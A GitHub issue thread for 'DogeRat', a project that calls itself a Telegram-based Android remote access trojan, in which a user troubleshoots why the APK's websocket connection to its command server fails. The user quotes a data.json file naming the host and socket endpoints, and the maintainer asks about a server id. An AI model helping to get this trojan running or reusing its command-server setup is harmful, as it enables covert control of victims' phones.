Did-Dog / DogeRat

A multifunctional Telegram based Android RAT without port forwarding.
MIT License
44 stars 56 forks source link

APK cannot send WSS request, but can send https requests. #5

Open marcussaw123 opened 6 months ago

marcussaw123 commented 6 months ago

data.json in APK

{
  "host" : "https://dogerat-thad.onrender.com/",
  "socket" : "wss://dogerat-thad.onrender.com/",
  "webView" : "https://www.youtube.com/"
}

image

In the image above, the bot can send a HTTPS request to send a text message. However, it cannot establish a connect with the websocket server as the bot detects no device.

The code has not been modified whatsoever it has been forked.

I ran the APK on BlueStack 5

Did-Dog commented 6 months ago

Do you correctly put your server id in that json file

marcussaw123 commented 6 months ago

where's that?

marcussaw123 commented 6 months ago

huh, since when there's a field for server id in data.json